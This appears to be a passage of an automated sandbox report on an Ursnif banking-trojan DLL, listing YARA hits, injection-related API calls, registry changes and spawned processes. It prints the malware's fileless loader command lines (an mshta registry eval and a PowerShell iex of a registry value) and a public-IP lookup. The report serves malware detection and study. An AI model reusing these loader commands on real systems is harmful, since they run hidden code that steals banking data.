Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.walmart.com/favicon.ico
Source: loaddll32.exe, 00000000.00000002.891686780.000000001008B000.00000002.00020000.sdmp	String found in binary or memory: http://www.xnview.comJ
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.yam.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&Version=2008-06-26&Operation
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://z.about.com/m/a08.ico
Source: powershell.exe, 00000018.00000002.885836354.000001D7BBF22000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000018.00000002.885836354.000001D7BBF22000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000018.00000002.885836354.000001D7BBF22000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000018.00000002.859302695.000001D7AC0CF000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000018.00000002.885836354.000001D7BBF22000.00000004.00000001.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Source: Yara match	File source: 00000000.00000003.683789524.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.843504876.000001A778130000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.683743665.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.852406498.0000000003190000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.914135566.000001B4FAD45000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.886882994.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.857674347.00000284AA705000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.779793362.0000000002F7C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.683848326.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.683682102.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.856702650.0000000000FE5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.914614455.0000027D4F835000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.683714735.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.835757240.00000000009E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.683763828.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.856122162.00000284AA500000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.683813516.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.826681690.000001D7C46A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.683833344.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3424, type: MEMORY
Source: Yara match	File source: Process Memory Space: control.exe PID: 6752, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6536, type: MEMORY
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 3656, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6476, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5528, type: MEMORY

Contains functionality to read the clipboard data

Source: C:\Windows\System32\loaddll32.exe

0_2_1007F8B0

Yara detected Keylogger Generic

Source: Yara match	File source: https___purefile24.top_4352wedfoifom.dll, type: SAMPLE
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6536, type: MEMORY
Source: Yara match	File source: 0.2.loaddll32.exe.10000000.4.unpack, type: UNPACKEDPE

E-Banking Fraud:

Yara detected Ursnif

Source: Yara match	File source: 00000000.00000003.683789524.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.843504876.000001A778130000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.683743665.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.852406498.0000000003190000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.914135566.000001B4FAD45000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.886882994.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.857674347.00000284AA705000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.779793362.0000000002F7C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.683848326.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.683682102.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.856702650.0000000000FE5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.914614455.0000027D4F835000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.683714735.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.835757240.00000000009E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.683763828.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.856122162.00000284AA500000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.683813516.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.826681690.000001D7C46A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.683833344.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3424, type: MEMORY
Source: Yara match	File source: Process Memory Space: control.exe PID: 6752, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6536, type: MEMORY
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 3656, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6476, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5528, type: MEMORY

Disables SPDY (HTTP compression, likely to perform web injects)

Source: C:\Windows\explorer.exe

Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

System Summary:

Writes or reads registry keys via WMI

Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Contains functionality to call native functions

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_01111A0B NtMapViewOfSection,	0_2_01111A0B
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_01111F8C GetProcAddress,NtCreateSection,memset,	0_2_01111F8C
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_011115D2 GetLastError,NtClose,LdrInitializeThunk,	0_2_011115D2
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_011123E5 NtQueryVirtualMemory,	0_2_011123E5
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02679E28 NtOpenProcess,LdrInitializeThunk,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	0_2_02679E28
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_026764BF NtMapViewOfSection,	0_2_026764BF
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02674093 GetProcAddress,NtCreateSection,memset,	0_2_02674093
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0267B2CD NtQueryVirtualMemory,	0_2_0267B2CD
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FC88E0 NtQueryInformationToken,NtQueryInformationToken,NtClose,	32_2_00FC88E0
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FCA9D8 NtWriteVirtualMemory,	32_2_00FCA9D8
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FB91C0 NtQueryInformationProcess,	32_2_00FB91C0
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FC1920 NtReadVirtualMemory,	32_2_00FC1920
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FB6104 NtQueryInformationProcess,	32_2_00FB6104
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FCDE98 NtAllocateVirtualMemory,	32_2_00FCDE98
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FC67C8 RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose,	32_2_00FC67C8
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FCD748 NtMapViewOfSection,	32_2_00FCD748
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FC7B34 NtCreateSection,	32_2_00FC7B34
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FCEB10 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,	32_2_00FCEB10
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FE9002 NtProtectVirtualMemory,NtProtectVirtualMemory,	32_2_00FE9002
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_00000284AA6E88E0 NtQueryInformationToken,NtQueryInformationToken,NtClose,	35_2_00000284AA6E88E0
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_00000284AA6D91C0 NtQueryInformationProcess,	35_2_00000284AA6D91C0
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_00000284AA709002 NtProtectVirtualMemory,NtProtectVirtualMemory,	35_2_00000284AA709002

Detected potential crypto function

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_011121C4	0_2_011121C4
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0267B0AC	0_2_0267B0AC
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02678534	0_2_02678534
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FC2A04	32_2_00FC2A04
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FC67C8	32_2_00FC67C8
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FB932C	32_2_00FB932C
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FC64DC	32_2_00FC64DC
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FCC8A8	32_2_00FCC8A8
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FC909C	32_2_00FC909C
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FB3498	32_2_00FB3498
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FCCC80	32_2_00FCCC80
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FCF06C	32_2_00FCF06C
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FCCC1C	32_2_00FCCC1C
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FBFDD8	32_2_00FBFDD8
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FD31A4	32_2_00FD31A4
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FBA1A0	32_2_00FBA1A0
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FD117C	32_2_00FD117C
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FC096B	32_2_00FC096B
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FD654C	32_2_00FD654C
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FB8D2C	32_2_00FB8D2C
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FC051C	32_2_00FC051C
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FD7EDC	32_2_00FD7EDC
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FB7ED8	32_2_00FB7ED8
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FC0EC4	32_2_00FC0EC4
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FB4AA0	32_2_00FB4AA0
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FBA6A4	32_2_00FBA6A4
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FBB2A4	32_2_00FBB2A4
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FC3A9C	32_2_00FC3A9C
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FD5A88	32_2_00FD5A88
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FC4670	32_2_00FC4670
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FC2648	32_2_00FC2648
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FB964C	32_2_00FB964C
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FD7228	32_2_00FD7228
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FCC224	32_2_00FCC224
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FD6BDC	32_2_00FD6BDC
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FCF7D4	32_2_00FCF7D4
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FD4FA8	32_2_00FD4FA8
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FB6380	32_2_00FB6380
Source: C:\Windows\System32\control.exe	Code function: 32_2_00FB5B40	32_2_00FB5B40
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_00000284AA6E2A04	35_2_00000284AA6E2A04
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_00000284AA6D932C	35_2_00000284AA6D932C
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_00000284AA6EF06C	35_2_00000284AA6EF06C
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_00000284AA6ECC80	35_2_00000284AA6ECC80
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_00000284AA6ECC1C	35_2_00000284AA6ECC1C
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_00000284AA6E64DC	35_2_00000284AA6E64DC
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_00000284AA6EC8A8	35_2_00000284AA6EC8A8
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_00000284AA6E909C	35_2_00000284AA6E909C
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_00000284AA6D3498	35_2_00000284AA6D3498
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_00000284AA6E096B	35_2_00000284AA6E096B
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_00000284AA6F117C	35_2_00000284AA6F117C
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_00000284AA6F654C	35_2_00000284AA6F654C
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_00000284AA6D8D2C	35_2_00000284AA6D8D2C
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_00000284AA6E051C	35_2_00000284AA6E051C
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_00000284AA6DFDD8	35_2_00000284AA6DFDD8
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_00000284AA6F31A4	35_2_00000284AA6F31A4
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_00000284AA6DA1A0	35_2_00000284AA6DA1A0
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_00000284AA6E4670	35_2_00000284AA6E4670
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_00000284AA6D964C	35_2_00000284AA6D964C
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_00000284AA6E2648	35_2_00000284AA6E2648
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_00000284AA6F7228	35_2_00000284AA6F7228
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_00000284AA6EC224	35_2_00000284AA6EC224
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_00000284AA6E0EC4	35_2_00000284AA6E0EC4
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_00000284AA6F7EDC	35_2_00000284AA6F7EDC
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_00000284AA6D7ED8	35_2_00000284AA6D7ED8
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_00000284AA6DA6A4	35_2_00000284AA6DA6A4
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_00000284AA6DB2A4	35_2_00000284AA6DB2A4
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_00000284AA6F5A88	35_2_00000284AA6F5A88
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_00000284AA6D4AA0	35_2_00000284AA6D4AA0
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_00000284AA6E3A9C	35_2_00000284AA6E3A9C
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_00000284AA6D6380	35_2_00000284AA6D6380
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_00000284AA6D5B40	35_2_00000284AA6D5B40
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_00000284AA6E67C8	35_2_00000284AA6E67C8
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_00000284AA6F6BDC	35_2_00000284AA6F6BDC
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_00000284AA6EF7D4	35_2_00000284AA6EF7D4
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_00000284AA6F4FA8	35_2_00000284AA6F4FA8

One or more processes crash

Source: unknown

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6536 -s 652

PE / OLE file has an invalid certificate

Source: https___purefile24.top_4352wedfoifom.dll

Static PE information: invalid certificate

PE file contains strange resources

Source: https___purefile24.top_4352wedfoifom.dll

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

PE file does not import any functions

Source: xxfxarla.dll.28.dr	Static PE information: No import functions for PE file found
Source: 5ycfw01g.dll.26.dr	Static PE information: No import functions for PE file found

Searches for the Microsoft Outlook file path

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Tries to load missing DLLs

Source: C:\Windows\SysWOW64\WerFault.exe	Section loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\WerFault.exe	Section loaded: ext-ms-win-xblauth-console-l1.dll
Source: C:\Windows\SysWOW64\WerFault.exe	Section loaded: ext-ms-win-xblauth-console-l1.dll

Source: classification engine

Classification label: mal100.bank.troj.spyw.evad.winDLL@47/62@3/2

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_0267A648 CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification,

0_2_0267A648

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{8E9E2BBA-2F7E-11EB-90EB-ECF4BBEA1588}.dat

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Mutant created: \Sessions\1\BaseNamedObjects\{3C647D8B-6BF2-CEE4-D530-CFE2D9647336}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6472:120:WilError_01
Source: C:\Windows\System32\control.exe	Mutant created: \Sessions\1\BaseNamedObjects\{347FEBA0-0321-86D2-2DA8-E71AB15C0BEE}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\{30798985-CF3A-E269-D964-73361DD857CA}
Source: C:\Windows\System32\rundll32.exe	Mutant created: \Sessions\1\BaseNamedObjects\{0C917B27-FB18-1E3A-E500-5F32E9340386}
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6536

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Temp\~DF479DF3B05A4A00F7.TMP

Jump to behavior

Source: https___purefile24.top_4352wedfoifom.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll

Source: C:\Program Files\internet explorer\iexplore.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: unknown

Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h

Source: https___purefile24.top_4352wedfoifom.dll

ReversingLabs: Detection: 14%

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\https___purefile24.top_4352wedfoifom.dll'
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6740 CREDAT:17410 /prefetch:2
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7160 CREDAT:17410 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7160 CREDAT:17420 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7160 CREDAT:82960 /prefetch:2
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\Audiinrt'));if(!window.flag)close()</script>'
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\5ycfw01g\5ycfw01g.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES4E97.tmp' 'c:\Users\user\AppData\Local\Temp\5ycfw01g\CSC315BF7D299C343BDBB661915DC5BF6A.TMP'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xxfxarla\xxfxarla.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES5D9B.tmp' 'c:\Users\user\AppData\Local\Temp\xxfxarla\CSC41D1ABDD5ED14B1EB51F15F27222E36E.TMP'
Source: unknown	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: unknown	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: unknown	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6536 -s 652
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\7849.bi1'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
